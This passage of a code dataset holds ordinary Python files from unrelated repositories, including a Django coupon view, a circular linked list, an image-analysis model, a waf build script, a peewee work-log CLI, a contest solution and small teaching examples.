        order = Order.objects.get(id=order_id)\n        account_type = AccountType.objects.get(pk=order.account_type.id)\n\n        discount = coupon.discount / 100\n        total_price = account_type.price\n        discounted_amount = round(total_price * discount, 2)\n        discounted_price = round(total_price - discounted_amount, 2)\n\n        order.amount = discounted_price\n        order.coupon = coupon\n        order.coupon_applied = True\n        order.save()\n\n        coupon.expiry_date = timezone.now() - timedelta(days=1)  # single-use coupon: set expiry date to a past date\n        coupon.save()\n\n        return JsonResponse({'discounted_price': discounted_price})\n    return JsonResponse({'error': 'POST request required'}, status=405)\n","repo_name":"Aremu-damilare/Lasfundiing-backend","sub_path":"store/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9605993966","text":"class Node:\n    def __init__(self, data):\n        self.data = data\n        self.next = None\n\nclass LinkedList:\n    def __init__(self):\n        self.a = None  # head of the circular list\n\n    def traverse(self):\n        if self.a is None:\n            return\n        temp = self.a\n        while True:\n            print(temp.data)\n            temp = temp.next\n            if temp == self.a:\n                break\n\n    def addToEmpty(self, data):\n        # Creating the new node and pointing it at itself makes a one-node circle\n        new = Node(data)\n        new.next = new\n        self.a = new\n\n    def addBegin(self, data):\n        if self.a is None:\n            self.addToEmpty(data)\n            return self.a\n        temp = Node(data)\n        # find the last node so it can point at the new head\n        last = self.a\n        while last.next != self.a:\n            last = last.next\n        temp.next = self.a\n        last.next = temp\n        self.a = temp\n        return self.a\n\n    def addEnd(self, data):\n        if self.a is None:\n            self.addToEmpty(data)\n            return self.a\n        temp = Node(data)\n        last = self.a\n        while last.next != self.a:\n            last = last.next\n        last.next = temp\n        temp.next = self.a\n        return self.a\n\n    def addAfter(self, data, item):\n        if self.a is None:\n            print(item, \"not present in the list\")\n            return self.a\n        temp = Node(data)\n        p = self.a\n        while True:\n            if p.data == item:\n                temp.next = p.next\n                p.next = temp\n                return self.a\n            p = p.next\n            if p == self.a:\n                print(item, \"not present in the list\")\n                return self.a\n\nll = LinkedList()\nll.addToEmpty(3)\nll.addBegin(5)\nll.addEnd(7)\nll.addAfter(9, 5)\nll.traverse()\n","repo_name":"nidhisha-shetty/DSA","sub_path":"LinkedList/circular_linkedlist/circular_llinkedlist_operations.py","file_name":"circular_llinkedlist_operations.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20756907461","text":"from pathlib import Path  # File system non-native OOP abstraction\nimport imghdr\nimport imageio\nfrom main_log import logging, MainLogger\nimport numpy as np\nfrom data_preprocessor import DataPreprocessor\nfrom matplotlib import pyplot as plt\nfrom multiprocessing import Value, Queue\nfrom model_worker import ModelWorker\n\nMainLogger.module_set.add(__name__)\n\n\nclass Model:\n    chi_str = f'chi'\n    stderr_str = f'stderr'\n    rmse_str = f'rmse'\n    exponents_str = f'exponents'\n\n    def __init__(self, log_queue: Queue, log_level: int):\n        self._supported_file_types = ['tiff']\n        self._is_file_loaded = False\n        self._raw_images = None\n        self._tensor_stack = []\n        self._intensity_threshold = 0\n        self._output_nan_replacement = {Model.stderr_str: 0,\n                                        Model.rmse_str: 0,\n                                        Model.exponents_str: 0,\n                                        Model.chi_str: 0}\n        self._log_queue = log_queue\n        self.log_level = log_level\n        self.logger = logging.getLogger(__name__)\n        self.logger.setLevel(self.log_level)\n\n    @staticmethod\n    def analyze_images(worker_args: tuple, log_queue: Queue, pb_value: Value, verbose_analysis: Value):\n        worker = ModelWorker(*worker_args, log_queue)\n        worker.analyze_images(pb_value, verbose_analysis)\n\n    @staticmethod\n    def display_first_n_pixel_histograms(worker_args: tuple, log_queue: Queue, n: int):\n        worker = ModelWorker(*worker_args, log_queue)\n        worker.show_pixel_histogram(n)\n\n
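    # Set the value that replaces NaNs in one of the output maps (chi, stderr, rmse, exponents).\n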
    def set_nan_replacement(self, output_type: str, nan_replacement: int):\n        if output_type in self._output_nan_replacement:\n            self.logger.info(f'Setting {output_type} nan replacement value, '\n                             f'old={str(self._output_nan_replacement[output_type])}'\n                             f' new={nan_replacement}')\n            self._output_nan_replacement[output_type] = nan_replacement\n\n    def clear_model(self):\n        self._is_file_loaded = False\n        self._raw_images = None\n        self._tensor_stack = []\n        self._intensity_threshold = 0\n        self._output_nan_replacement = {Model.rmse_str: 0,\n                                        Model.exponents_str: 0,\n                                        Model.chi_str: 0,\n                                        Model.stderr_str: 0}\n\n    def __set_file_loaded(self, is_file_loaded: bool):\n        self.logger.debug(f'Setting file_loaded flag to {is_file_loaded}')\n        self._is_file_loaded = is_file_loaded\n\n    def set_intensity_threshold(self, threshold: int):\n        self.logger.info(f'Setting intensity threshold. old={self._intensity_threshold}, new={threshold}')\n        self._intensity_threshold = threshold\n\n    def load_data(self, input_file_path: str) -> bool:\n        success: bool = False\n        if not self.__is_input_file_valid(input_file_path):\n            self.logger.warning('Attempt to load an invalid file, ignoring')\n        else:\n            try:\n                self._raw_images = imageio.volread(uri=input_file_path)\n                self.logger.info(f'Loaded {len(self._raw_images)} x '\n                                 f'{self._raw_images[0].shape} {imghdr.what(input_file_path)} images')\n                self._tensor_stack.append(self._raw_images.copy())\n                self.__set_file_loaded(True)\n                success = True\n            except Exception as e:\n                self.__set_file_loaded(False)\n                self.logger.info(f'Caught exception when running:\\n{e}')\n        return success\n\n    def __is_input_file_valid(self, input_file_path: str) -> bool:\n        self.logger.info(f'Validating input file')\n        valid = False\n        try:\n            input_file = Path(input_file_path)\n        except Exception as e:\n            self.logger.info(f'Caught exception when processing path:\\n{e}')\n            return valid\n\n        if not input_file.exists():\n            self.logger.warning(f'Input path leads to a non-existing file')\n            return valid\n\n        if not input_file.is_file():\n            self.logger.warning(f'Input path does not lead to a file')\n            return valid\n\n        try:\n            file_type = imghdr.what(input_file_path)\n        except Exception as e:\n            self.logger.info(f'Caught exception when reading input file binary header:\\n{e}')\n            return valid\n\n        if file_type not in self._supported_file_types:\n            self.logger.warning(f'{file_type} is an unsupported file type')\n            return valid\n\n        self.logger.info(f'Input file is valid')\n        valid = True\n        return valid\n\n    def valid_for_conv_filter(self, kernel_size):\n        if len(self._tensor_stack) == 0:\n            return False\n        image_shape = self._tensor_stack[-1][0].shape\n        max_dim = max(image_shape)\n        if kernel_size > max_dim:\n            return False\n        else:\n            return True\n\n    def valid_for_block_reduce(self, block_size):\n        if len(self._tensor_stack) == 0:\n            return False\n        image_shape = self._tensor_stack[-1][0].shape\n        for dim in image_shape:\n            if not (dim % block_size) == 0:\n                return False\n        return True\n\n    def apply_block_reduce(self, reduce_type, block_size):\n        if len(self._tensor_stack) > 0:\n            self.logger.info(f'Applying {reduce_type} pooling, block size: {str(block_size)}')\n            dp = DataPreprocessor(self._tensor_stack[-1], self._log_queue, self.log_level)\n            dp.apply_block_reduce(reduce_type, block_size)\n            self._tensor_stack.append(dp.get_processed_images())\n        else:\n            self.logger.error(f'Tensor stack is empty')\n\n    def apply_filter(self, filter_type: str, kernel_shape: tuple):\n        if len(self._tensor_stack) > 0:\n            dp = DataPreprocessor(self._tensor_stack[-1], self._log_queue, self.log_level)\n
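            # Dispatch to the matching DataPreprocessor smoothing filter; unknown types are logged and ignored.\n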
            if filter_type == 'median':\n                dp.apply_median_filter(kernel_shape)\n            elif filter_type == 'uniform':\n                dp.apply_uniform_filter(kernel_shape)\n            elif filter_type == 'gaussian':\n                dp.apply_gaussian_filter(kernel_shape)\n            else:\n                self.logger.error(f'Unknown filter type {filter_type}')\n                return\n            self._tensor_stack.append(dp.get_processed_images())\n        else:\n            self.logger.error(f'Tensor stack is empty')\n\n    def display_images(self):\n        if len(self._tensor_stack) > 1:\n            images = self._tensor_stack[-1]\n            figure_data = []\n            for i in range(len(images)):\n                f, figure_axis = plt.subplots(1, 2)\n\n                figure_axis[0].imshow(self._raw_images[i])\n                figure_axis[0].set_title('Raw')\n\n                figure_axis[1].imshow(images[i])\n                figure_axis[1].set_title('Filtered')\n                figure_data.append((f, figure_axis))\n                f.suptitle(f'Image {i + 1} Before/After')\n            plt.show()\n\n        elif len(self._tensor_stack) == 1:\n            images = self._tensor_stack[-1]\n            figure_data = []\n            for i in range(len(images)):\n                f, figure_axis = plt.subplots(1, 1)\n                figure_axis.imshow(self._raw_images[i])\n                figure_axis.set_title(f'Raw image {i+1}')\n                figure_data.append((f, figure_axis))\n            plt.show()\n\n    def discard_top_tensor(self):\n        prev_size = len(self._tensor_stack)\n        if self._tensor_stack:\n            self._tensor_stack.pop()\n        cur_size = len(self._tensor_stack)\n        self.logger.info(f'Discarded top tensor from the tensor stack, stack size: (prev={prev_size}, cur={cur_size})')\n\n    def get_tensor_stack_size(self) -> int:\n        return len(self._tensor_stack)\n\n    def get_top_images(self) -> np.ndarray:\n        if len(self._tensor_stack) > 0:\n            return self._tensor_stack[-1]\n        else:\n            return np.zeros(shape=(1, 1, 1))\n\n    def get_intensity_threshold(self) -> int:\n        return self._intensity_threshold\n\n    def get_nan_replacements(self) -> dict:\n        return self._output_nan_replacement\n\n    def save_top_images(self, name: str):\n        images = self._tensor_stack[-1]\n        imageio.mimwrite(name, images, bigtiff=False)\n","repo_name":"geekazaurus/fret_utility","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":8397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6608898295","text":"#! 
/usr/bin/env python\n\nimport sys, re, os\nimport waf_dynamo\nimport Task, Utils\nfrom TaskGen import taskgen, feature, after, before\n\nVERSION='0.1'\nAPPNAME='extender'\n\nsrcdir = '.'\nblddir = 'build'\n\ndef append_yaml(task):\n path = task.outputs[0].bldpath(task.env)\n with open(path, 'wb') as out_f:\n for i in task.inputs:\n with open(i.abspath(), 'rb') as in_f:\n data = in_f.read();\n out_f.write(data)\n\n digest = Utils.h_file(path)\n for i in task.inputs:\n task.generator.bld.node_sigs[i.variant(task.env)][i.id] = digest\n return 0\n\ntask = Task.task_type_from_func('merge_yaml',\n func = append_yaml,\n color = 'PINK',\n before = 'cc cxx')\n@taskgen\n@feature('merge_yaml')\ndef feature_merge_yaml(self):\n inputs = []\n for name in self.yaml_source:\n i = self.path.find_or_declare(name)\n inputs.append(i)\n\n out = self.path.find_or_declare([self.yaml_target])\n\n task = self.create_task('merge_yaml')\n task.set_inputs(inputs)\n task.set_outputs(out)\n\ndef init():\n pass\n\ndef set_options(opt):\n opt.tool_options('waf_dynamo')\n\ndef configure(conf):\n conf.check_tool('waf_dynamo')\n\ndef build(bld):\n\n private_platforms = ('nx64', 'ps4')\n\n source = ['build.yml']\n for platform in private_platforms:\n private_source = 'build_%s.yml' % platform\n if os.path.exists(private_source):\n source += [private_source]\n\n bld.new_task_gen(features = 'merge_yaml',\n yaml_source = source,\n yaml_target = 'build.yml',\n name='Build Yaml')\n\n variants = ('debug', 'release', 'headless')\n for variant in variants:\n source = ['variants/%s.appmanifest' % variant]\n for platform in private_platforms:\n private_source = 'variants/%s_%s.appmanifest' % (variant, platform)\n if os.path.exists(private_source):\n source += [private_source]\n\n bld.new_task_gen(features = 'merge_yaml',\n yaml_source = source,\n yaml_target = source[0],\n name='Build Yaml %s' % variant)\n\n bld.add_group()\n bld.install_files('${PREFIX}/extender', 'build.yml')\n bld.install_files('${PREFIX}/extender/variants', 'variants/debug.appmanifest')\n bld.install_files('${PREFIX}/extender/variants', 'variants/release.appmanifest')\n bld.install_files('${PREFIX}/extender/variants', 'variants/headless.appmanifest')\n\ndef shutdown():\n pass\n","repo_name":"cocos3ds/defold","sub_path":"share/extender/wscript","file_name":"wscript","file_ext":"","file_size_in_byte":2613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"9392087857","text":"from argparse import ArgumentParser\nimport unittest\nfrom unittest.mock import patch\n\nfrom geoalchemy2 import load_spatialite\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.event import listen\nfrom sqlalchemy.orm import Session\n\nfrom vipersci.vis.db import Base\nfrom vipersci.vis.db import create_vis_dbs as cvd\n\n\nclass TestParser(unittest.TestCase):\n def test_arg_parser(self):\n p = cvd.arg_parser()\n self.assertIsInstance(p, ArgumentParser)\n # self.assertRaises(SystemExit, p.parse_args)\n d = vars(p.parse_args([]))\n self.assertIn(\"dburl\", d)\n\n\nclass TestDatabase(unittest.TestCase):\n def setUp(self) -> None:\n self.engine = create_engine(\"sqlite:///:memory:\")\n listen(self.engine, \"connect\", load_spatialite)\n self.session = Session(self.engine)\n\n def tearDown(self):\n Base.metadata.drop_all(self.engine)\n\n def test_main(self):\n pa_ret_val = cvd.arg_parser().parse_args([\"-d\", \"foo\"])\n with patch(\"vipersci.vis.db.create_vis_dbs.arg_parser\") as parser:\n parser.return_value.parse_args.return_value = 
pa_ret_val\n            with patch(\n                \"vipersci.vis.db.create_vis_dbs.create_engine\", return_value=self.engine\n            ):\n                cvd.main()\n","repo_name":"NeoGeographyToolkit/vipersci","sub_path":"tests/test_create_vis_dbs.py","file_name":"test_create_vis_dbs.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"26769458267","text":"#!/usr/bin/env python3\r\n\r\nimport datetime\r\nimport os\r\n\r\nfrom collections import OrderedDict\r\nfrom peewee import *\r\n\r\n\r\ndb = SqliteDatabase('record.db')\r\nNAMES = []\r\nRECORD = []\r\nLETTERS = 'abcdefghijklmnopqrstuvwxyz '\r\n\r\n\r\nclass Entry(Model):\r\n    \"\"\"Entry Model\"\"\"\r\n    timestamp = DateTimeField(default=datetime.date.today)\r\n    name = CharField(max_length=100)\r\n    task = CharField(max_length=255)\r\n    time = IntegerField()\r\n    notes = TextField(default='')\r\n\r\n    class Meta:\r\n        database = db\r\n\r\n\r\ndef init():\r\n    \"\"\"Initialize\"\"\"\r\n    db.connect()\r\n    db.create_tables([Entry], safe=True)\r\n    db.close()\r\n\r\n\r\ndef clear_screen():\r\n    \"\"\"Clear screen\"\"\"\r\n    os.system('cls' if os.name == 'nt' else 'clear')\r\n\r\n\r\ndef check(prompt, boolean=None):\r\n    \"\"\"Check the correct input\"\"\"\r\n    while True:\r\n        clear_screen()\r\n        if prompt == 'time':\r\n            try:\r\n                clear_screen()\r\n                print('Enter time spent on task')\r\n                time = int(input('>').strip())\r\n                if not time:\r\n                    clear_screen()\r\n                    print('You must fill this field!')\r\n                    continue\r\n                return time\r\n            except ValueError:\r\n                clear_screen()\r\n                print('JUST NUMBERS!!')\r\n        elif prompt == 'name':\r\n            clear_screen()\r\n            if boolean:\r\n                print('Enter {}'.format(prompt))\r\n                name = input('>').strip()\r\n                if not name:\r\n                    clear_screen()\r\n                    print('You must provide a name!')\r\n                    continue\r\n            else:\r\n                print('Enter first {}'.format(prompt))\r\n                first_name = input('>').strip().capitalize()\r\n                print('Enter last {}'.format(prompt))\r\n                last_name = input('>').strip().capitalize()\r\n                if not first_name or not last_name:\r\n                    clear_screen()\r\n                    print('You must fill this field!')\r\n                    continue\r\n                name = first_name + ' ' + last_name\r\n\r\n            # Reject anything that is not a letter or a space\r\n            if [x for x in name if x.lower() not in LETTERS]:\r\n                clear_screen()\r\n                print('JUST ALPHABET LETTERS!')\r\n            else:\r\n                return name\r\n        elif prompt == 'task':\r\n            clear_screen()\r\n            print('Enter {}'.format(prompt))\r\n            task = input('>').strip()\r\n            if not task:\r\n                clear_screen()\r\n                print('You must fill this field!')\r\n                continue\r\n            return task\r\n\r\n\r\ndef check_date():\r\n    \"\"\"Checks date\"\"\"\r\n    while True:\r\n        clear_screen()\r\n        try:\r\n            m, d, y = input('Enter date(MM/DD/YYYY):\\n>').split('/')\r\n            return datetime.date(year=int(y), month=int(m), day=int(d))\r\n        except ValueError:\r\n            clear_screen()\r\n            print('Enter a valid date!')\r\n\r\n\r\ndef get_option(poz, entry, name=None):\r\n    \"\"\"The result menu options, removes the not wanted option \"\"\"\r\n    if name:\r\n        prompt = ['[P]revious', '[N]ext', '[E]nter', '[R]eturn to menu']\r\n    else:\r\n        prompt = ['[P]revious', '[N]ext', '[E]dit', '[D]elete', '[R]eturn to menu']\r\n    if poz == 0:\r\n        prompt.remove('[P]revious')\r\n    if poz == len(entry) - 1:\r\n        prompt.remove('[N]ext')\r\n    return prompt\r\n\r\n\r\ndef add_entry():\r\n    \"\"\"Add new record\"\"\"\r\n    clear_screen()\r\n    name = check('name')\r\n    task = check('task')\r\n
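    # check() keeps re-prompting until the entered time parses as an integer.\r\n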
    time = check('time')\r\n    print('Enter additional notes(Optional)')\r\n    notes = input('>').strip()\r\n    try:\r\n        Entry.create(name=name,\r\n                     task=task,\r\n                     time=time,\r\n                     notes=notes)\r\n        print(\"Record successfully saved!\")\r\n    except Exception:\r\n        print(\"Failed to save the record!\")\r\n\r\n\r\ndef update_entry(query, index):\r\n    \"\"\"Get new input for each field and save it\"\"\"\r\n    timestamp = query.timestamp.strftime('%B %d, %Y')\r\n    clear_screen()\r\n    print('{}\\n'\r\n          'Old employee name: {}\\n'\r\n          'Old task name: {}\\n'\r\n          'Old time spent: {}\\n'\r\n          'Old notes: {}'.format(timestamp,\r\n                                 query.name,\r\n                                 query.task,\r\n                                 query.time,\r\n                                 query.notes))\r\n    new_timestamp = check_date()\r\n    new_name = check('name')\r\n    new_task = check('task')\r\n    new_time = check('time')\r\n    new_notes = input('Enter notes(Optional): \\n>').strip()\r\n    new_record = Entry.get(name=query.name,\r\n                           timestamp=query.timestamp,\r\n                           task=query.task,\r\n                           time=query.time,\r\n                           notes=query.notes)\r\n    new_record.timestamp = new_timestamp\r\n    new_record.name = new_name\r\n    new_record.task = new_task\r\n    new_record.time = new_time\r\n    new_record.notes = new_notes\r\n    new_record.save()\r\n    RECORD.pop(index)\r\n    entry = Entry.get(name=new_name,\r\n                      timestamp=new_timestamp,\r\n                      task=new_task,\r\n                      notes=new_notes)\r\n    RECORD.insert(index, entry)\r\n    # if query.name != new_name:\r\n    #     NAMES.remove(query.name)\r\n    print('New record saved!')\r\n\r\n\r\ndef remove_entry(query):\r\n    \"\"\"Delete instance from query\"\"\"\r\n    Entry.delete_instance(query)\r\n\r\n\r\ndef validate(query):\r\n    \"\"\"Check if the query has results; if so, populate the RECORD list\"\"\"\r\n    RECORD.clear()\r\n    if not query:\r\n        print(\"Record doesn't exist!\")\r\n    for x in query:\r\n        RECORD.append(x)\r\n    if len(RECORD) != 0:\r\n        result_menu()\r\n\r\n\r\ndef search_by_date():\r\n    \"\"\"Search by date\"\"\"\r\n    query = check_date()\r\n    return_value = Entry.select().where(Entry.timestamp.contains(query))\r\n    validate(return_value)\r\n\r\n\r\ndef search_by_date_range():\r\n    \"\"\"Search by date range\"\"\"\r\n    start = check_date() - datetime.timedelta(days=1)\r\n    end = check_date() + datetime.timedelta(days=1)\r\n    return_value = Entry.select().where(Entry.timestamp.between(start, end))\r\n    validate(return_value)\r\n\r\n\r\ndef search_employee_name():\r\n    \"\"\"Search employee name\"\"\"\r\n    NAMES.clear()\r\n    RECORD.clear()\r\n    query = check('name', True)\r\n    return_value = Entry.select().where(Entry.name.contains(query))\r\n    if not return_value:\r\n        print(\"Record doesn't exist!\")\r\n    for x in return_value:\r\n        if x.name in NAMES:\r\n            continue\r\n        else:\r\n            NAMES.append(x.name)\r\n    if len(NAMES) != 0:\r\n        name_list_menu()\r\n\r\n\r\ndef search_task_name():\r\n    \"\"\"Search task name\"\"\"\r\n    query = input('Search for task: \\n>')\r\n    return_value = Entry.select().where(Entry.task.contains(query))\r\n    validate(return_value)\r\n\r\n\r\ndef search_time_spent():\r\n    \"\"\"Search time spent\"\"\"\r\n    query = check('time')\r\n    return_value = Entry.select().where(Entry.time == query)\r\n    validate(return_value)\r\n\r\n\r\ndef search_notes():\r\n    \"\"\"Search notes\"\"\"\r\n    query = input('Search for notes: \\n>')\r\n    return_value = Entry.select().where(Entry.notes.contains(query))\r\n    validate(return_value)\r\n\r\n\r\ndef name_list_menu():\r\n    \"\"\"Name list\"\"\"\r\n    action = None\r\n    index = 0\r\n    while action != 'r':\r\n        clear_screen()\r\n        if len(NAMES) == 1:\r\n            index = 0\r\n        if len(NAMES) == 0:\r\n            break\r\n        print_bar = '=' * (15 + 
len(NAMES[index]))\r\n print(print_bar)\r\n print('Employee name: {}'.format(NAMES[index]))\r\n print(print_bar)\r\n print('Result {} of {}\\n'.format(index + 1, len(NAMES)))\r\n print(' '.join(get_option(index, NAMES, True)))\r\n action = input('>').lower().strip()\r\n if action not in ['p', 'n', 'e', 'r']:\r\n print('Choose from the available letters!')\r\n continue\r\n if (index + 1) == 1 and action == 'p':\r\n print('Choose from the available letters!')\r\n continue\r\n if (index + 1) == len(NAMES) and action == 'n':\r\n print('Choose from the available letters!')\r\n continue\r\n if action == 'p':\r\n clear_screen()\r\n index -= 1\r\n if action == 'n':\r\n clear_screen()\r\n index += 1\r\n if action == 'e':\r\n clear_screen()\r\n RECORD.clear()\r\n entries = Entry.select()\\\r\n .where(Entry.name.contains(NAMES[index]))\r\n for x in entries:\r\n RECORD.append(x)\r\n result_menu()\r\n if index == 1:\r\n index += 1\r\n if index == len(NAMES):\r\n index -= 1\r\n continue\r\n\r\n\r\ndef result_menu():\r\n \"\"\"Shows the searched entries one by one with detailed description,\r\n Navigation included\"\"\"\r\n action, index = None, 0\r\n prompt = 'Choose from the available letters!'\r\n while action != 'r':\r\n clear_screen()\r\n if len(RECORD) == 1:\r\n index = 0\r\n timestamp = RECORD[index].timestamp.strftime('%B %d, %Y')\r\n print('=' * len(timestamp))\r\n print('{}\\n'\r\n 'Employee name: {}\\n'\r\n 'Task name: {}\\n'\r\n 'Time spent: {}\\n'\r\n 'Notes: {}'.format(timestamp,\r\n RECORD[index].name,\r\n RECORD[index].task,\r\n RECORD[index].time,\r\n RECORD[index].notes))\r\n print('=' * (len(RECORD[index].notes) + 7) + '\\n')\r\n print('Result {} of {}'.format(index + 1, len(RECORD)))\r\n print(' '.join(get_option(index, RECORD)))\r\n action = input('>').lower().strip()\r\n if action not in ['p', 'n', 'e', 'd', 'r']:\r\n clear_screen()\r\n print(prompt)\r\n continue\r\n if (index + 1) == 1 and action == 'p':\r\n print(prompt)\r\n continue\r\n if (index + 1) == len(RECORD) and action == 'n':\r\n print(prompt)\r\n continue\r\n if action == 'n':\r\n clear_screen()\r\n index += 1\r\n if action == 'p':\r\n clear_screen()\r\n index -= 1\r\n if action == 'e':\r\n clear_screen()\r\n update_entry(RECORD[index], index)\r\n continue\r\n if action == 'd':\r\n clear_screen()\r\n if input(\"Are you sure? 
[y/N] \").lower() == 'y':\r\n remove_entry(RECORD[index])\r\n name = RECORD[index].name\r\n RECORD.pop(index)\r\n if index == 1:\r\n index += 1\r\n if index == len(RECORD):\r\n index -= 1\r\n if len(RECORD) == 0 and len(NAMES) != 0:\r\n NAMES.remove(name)\r\n break\r\n if len(RECORD) == 0:\r\n break\r\n print('Record deleted!')\r\n continue\r\n\r\n\r\ndef sub_menu():\r\n \"\"\"Search records\"\"\"\r\n action = None\r\n while action != 'g':\r\n clear_screen()\r\n if len(Entry.select()) == 0:\r\n break\r\n for key, value in s_menu.items():\r\n print(' {}] {}'.format(key, value.__doc__))\r\n print(' g] Return to menu')\r\n action = input('>').lower().strip()\r\n if action in s_menu:\r\n clear_screen()\r\n s_menu[action]()\r\n\r\n\r\ndef main_menu():\r\n \"\"\"Show the menu\"\"\"\r\n init()\r\n action = None\r\n while action != 'q':\r\n clear_screen()\r\n length = len(Entry.select())\r\n if length == 1:\r\n plural = ''\r\n else:\r\n plural = 's'\r\n print(' {} record{} in record.db.\\n'.format(length, plural))\r\n for key, value in menu.items():\r\n print(' {}] {}'.format(key, value.__doc__))\r\n print(' q] Quit')\r\n action = input('>').lower().strip()\r\n if action in menu:\r\n clear_screen()\r\n menu[action]()\r\n\r\n\r\nmenu = OrderedDict([\r\n ('a', add_entry),\r\n ('s', sub_menu)])\r\ns_menu = OrderedDict([\r\n ('a', search_by_date),\r\n ('b', search_by_date_range),\r\n ('c', search_employee_name),\r\n ('d', search_task_name),\r\n ('e', search_time_spent),\r\n ('f', search_notes)])\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main_menu()\r\n","repo_name":"OzRayan/Work_Log_Database","sub_path":"work_log.py","file_name":"work_log.py","file_ext":"py","file_size_in_byte":12580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31624647378","text":"# a,b = map(int,input().split())\n# a = list(map(int,input().split()))\n# a = [list(map(int,input().split())) for _ in range(n)]\n\nimport sys\nimport os\nf = open('../../input.txt', 'r')\nsys.stdin = f\n\nk = int(input())\nx,y = map(int,input().split())\n\nif((x+y)%2==1)&(k%2==0):\n print(-1)\n exit()\n\nif(k==1):\n print(x+y)\n a = 0\n b = 0\n while(a!=x):\n a += 1 * ((x>0)*2-1)\n print(' '.join(map(str, [a,b])))\n while(b!=y):\n b += 1 * ((y>0)*2-1)\n print(' '.join(map(str, [a,b])))\n exit()\n\nif(k==2):\n print((x+y)//2)\n a = 0\n b = 0\n if(x%2==1):\n a = (x>0)*2-1\n b = (y>0)*2-1\n print(' '.join(map(str, [a,b])))\n while(a!=x):\n a += 2 * ((x>0)*2-1)\n print(' '.join(map(str, [a,b])))\n while(b!=y):\n b += 2 * ((y>0)*2-1)\n print(' '.join(map(str, [a,b])))\n exit()\n\nsum_xy = x+y\ndif_xy = x-y\n\ndef print_ans():\n print(len(steps)-1)\n for tmp in steps[-2::-1]:\n a,b = tmp\n print(' '.join(map(str, [(a+b)//2, (a-b)//2])))\n\nsteps = []\nsteps.append([sum_xy,dif_xy])\n\n# cnt = 0\n# cnt += 1\n# if(cnt>10):\n# print(steps)\n# exit()\n\nwhile((sum_xy%k)!=0):\n if((k%2==1)&( (abs(sum_xy)%k)%2 ==0)):\n if(sum_xy > 0):\n sum_xy -= k-2\n else:\n sum_xy += k-2\n else:\n if(sum_xy > 0):\n sum_xy -= (sum_xy%k)\n else:\n sum_xy -= (sum_xy%k) - k\n\n dif_xy -= k * ((dif_xy>0)*2-1)\n steps.append([sum_xy, dif_xy])\n\nif(sum_xy==0)&(dif_xy==0):\n print_ans()\n exit()\n\nwhile(dif_xy%k!=0):\n if((k%2==1)&( (abs(dif_xy)%k)%2 ==0)):\n if(dif_xy > 0):\n dif_xy -= k-2\n else:\n dif_xy += k-2\n else:\n if(dif_xy > 0):\n dif_xy -= (dif_xy%k)\n else:\n dif_xy -= (dif_xy%k) - k\n\n sum_xy -= k * ((sum_xy>0)*2-1)\n steps.append([sum_xy, dif_xy])\n\n\nwhile(sum_xy!=0)|(dif_xy!=0):\n 
if((abs(sum_xy)==k)&(dif_xy==0))|((sum_xy==0)&(abs(dif_xy)==k)):\r\n        sum_xy = 0\r\n        dif_xy = 0\r\n        steps.append([sum_xy, dif_xy])\r\n        break\r\n\r\n    sum_xy -= k * ((sum_xy>0)*2-1)\r\n    dif_xy -= k * ((dif_xy>0)*2-1)\r\n    steps.append([sum_xy, dif_xy])\r\n\r\nprint_ans()\r\n","repo_name":"komajun365/competitive_programming","sub_path":"abc/abc135_old/e.py","file_name":"e.py","file_ext":"py","file_size_in_byte":2203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6916338335","text":"import turtle\nimport random\n\nturtle.setup(900, 900)\nturtle.shape(\"classic\")\nturtle.color(\"#E96479\")\nturtle.bgcolor('#4D455D')\nturtle.width(2)\n\n# Move to a random point to start the drawing\nturtle.penup()\nturtle.goto(random.randint(-350, 350), random.randint(-350, 350))\nturtle.pendown()\n\n# Define a function that draws a filled square\n\n\ndef draw_square():\n    turtle.begin_fill()\n    # Draw a square with side length side\n    side = random.randint(10, 100)\n    for i in range(4):\n        turtle.forward(side)\n        turtle.left(90)\n\n    turtle.end_fill()\n\n\n# Now create the picture\n\nn = 10  # Number of squares\n\nfor i in range(n-1):\n    draw_square()\n    turtle.goto(random.randint(-350, 350), random.randint(-350, 350))\n\n\ndraw_square()\n# Hide the turtle\nturtle.hideturtle()\n\n# Main loop\nturtle.mainloop()\n","repo_name":"aleksmn/PythonLessons","sub_path":"module-1/turtle-demo/abstract_1.py","file_name":"abstract_1.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31022821707","text":"from calculadora import Calculadora\n\n\nclass CalculadoraDecorada:\n    def __init__(self, calculadora):\n        self.calculadora = calculadora\n\n    def converterNumero(self, numero):\n        if not isinstance(numero, str):\n            return numero\n        return {\n            \"um\": 1, \"dois\": 2, \"três\": 3, \"quatro\": 4, \"cinco\": 5,\n            \"seis\": 6, \"sete\": 7, \"oito\": 8, \"nove\": 9, \"dez\": 10,\n        }.get(numero)\n\n    def soma(self, x, y):\n        return self.calculadora.soma(\n            self.converterNumero(x),\n            self.converterNumero(y),\n        )\n\n\ncalculadora = Calculadora()\ncalculadora_decorada = CalculadoraDecorada(calculadora)\nprint(calculadora_decorada.soma(2, 3))\nprint(calculadora_decorada.soma('um', 'oito'))\n","repo_name":"dabcsouza/trybe-exercicios","sub_path":"ciencia-da-computacao/bloco-34-padroes-de-projeto/dia-03-padroes-decorator-observer-factory/example/calculadora_decorada.py","file_name":"calculadora_decorada.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19743350532","text":"from MagniPy.util import chi_square_img\nimport numpy as np\nfrom MagniPy.util import interpolate_ray_paths\n\ndef split_realization(datatofit, realization):\n\n    foreground = realization.filter(datatofit.x, datatofit.y, 